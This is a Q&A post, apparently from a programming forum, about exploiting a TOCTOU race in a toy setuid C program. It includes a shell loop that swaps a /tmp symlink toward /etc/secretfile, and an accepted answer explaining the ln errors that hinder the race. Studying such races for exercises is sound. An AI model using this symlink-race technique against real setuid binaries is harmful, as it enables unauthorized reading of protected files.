# ln fails when trying to manully trigger race conditoin

Tags: c, race-condition, exploit

**It's just an exercise. I am not trying to exploit something...**

I have a setuid toy program to exploit(decompiled version):

```
int main(int argc, const char **argv)
{
  int v3, v4, v5;
  int result;
  int v7;
  int v8;
  int v9;
  int v10;

  memset(&v9, 0, 0x14u);
  if ( !access("/tmp/exploitme", 4) )
  {
    v3 = geteuid();
    v4 = geteuid();
    v5 = geteuid();
    setresuid(v5, v4, v3, argv);
    v8 = open("/tmp/exploitme", 0);
    if ( v8 < 0 )
      exit(-1);
    read(v8, &v9, 0x13u);
    write(1, &v9, 0x13u);
  }
  result = 0;
  return result;
}
```

There exists race condition between the `access` and `open`.
So here is the script, I use the classical trick: alter nice value to reduce scheduling priority.

```
#!/bin/sh
        touch /tmp/myfile
        while true; do
                ln -sf /tmp/myfile /tmp/exploitme &
                nice -15 /workspace/toy &
                ln -sf /etc/secretfile /tmp/exploitme &
        done
```

But I get these errors from the script:

```
ln: failed to create symbolic link '/tmp/expolitme': File exists
ln: cannot remove '/tmp/expolit': No such file or directory
```

I already use -f option of `ln` to force create symlink. Why I have these errors?

Comment: The errors result from script, not C program, correct?  Post should be tagged Linux, Script.  Not C

Comment: yes ,the errors are from the script

Comment: The C code is completely irrelevant to the post.  It is also curious that you are openly asking for help in creating an exploit.

Comment: It's just an exercise. I am not trying to exploit something... Sorry, I should point that out.

Answer (score 1, accepted):

The problem is with the way you call `ln`-- multiple instances at the same time. The way `ln` "forces" symbolic links is that it *unlinks* (removes) the destination and recreates it again. But you are calling multiple `ln` instances at the same time which results in a race condition with other calls to `ln`. Because one or more instances do unlink of `tmp/exploitme` but some other instance has already created the new `/tmp/exploitme`; so the "file exists". If you don't spawn multiple `ln` instances in the background, you won't observe this problem.

Let's me show an example with 2 instances: A and B

```
Instance A                           Instance B 

Calls ln                             Calls ln 

Deletes /tmp/expolitme if exists     Deletes /tmp/expolitme if exists

Creates /tmp/expolitme

                                     Creates /tmp/expolitme 
                                     (File exists - because A created it already)
```